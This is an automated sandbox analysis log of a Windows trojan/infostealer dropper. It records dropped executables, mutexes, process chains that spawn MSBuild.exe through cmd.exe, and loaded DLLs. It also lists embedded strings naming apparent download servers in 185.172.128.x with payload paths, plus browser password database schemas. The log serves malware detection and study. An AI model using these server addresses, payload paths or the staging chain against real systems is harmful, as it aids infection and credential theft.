Source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, -Module-.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@27/64@4/8
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Code function: 1_2_6BBA0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 1_2_6BBA0300
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DCD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8, 2_2_00DCD660
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_04255BD6 CreateToolhelp32Snapshot,Module32First, 0_2_04255BD6
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar, 0_2_0042628B
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Code function: 2_2_00DA8040 LoadResource,LockResource,SizeofResource, 2_2_00DA8040
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6916
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess416
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Jump to behavior
Source: Yara match File source: 5.0.u5c4.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.1829719005.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1830645130.00000000070B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe, type: DROPPED
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: eight 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: eight 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: Installed 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: Installed 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .zip 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .zip 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: \run.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: \run.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_00424A0E
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: @ 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.90 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: Installed 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: Installed 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.203 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.59 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /timeSync.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /syncUpd.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /1/Package.zip 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .zip 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .zip 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: \run.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: \run.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: 185.172.128.228 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: /BroomSetup.exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_05C04C75
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Command line argument: .exe 0_2_05C04C75
Source: kO1P1YnLst.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u5c4.0.exe, u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u5c4.0.exe, 00000001.00000003.1869359519.00000000245B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: u5c4.0.exe, 00000001.00000002.2519692342.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: kO1P1YnLst.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\kO1P1YnLst.exe File read: C:\Users\user\Desktop\kO1P1YnLst.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\kO1P1YnLst.exe "C:\Users\user\Desktop\kO1P1YnLst.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 944
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2256
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.0.exe "C:\Users\user\AppData\Local\Temp\u5c4.0.exe" Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe "C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe" Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Process created: C:\Users\user\AppData\Local\Temp\u5c4.3.exe "C:\Users\user\AppData\Local\Temp\u5c4.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe Process created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe "C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe"
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: zipfldr.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winshfhc.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: winshfhc.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wdscore.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\kO1P1YnLst.exe Section loaded: nlaapi.dll Jump to behavior
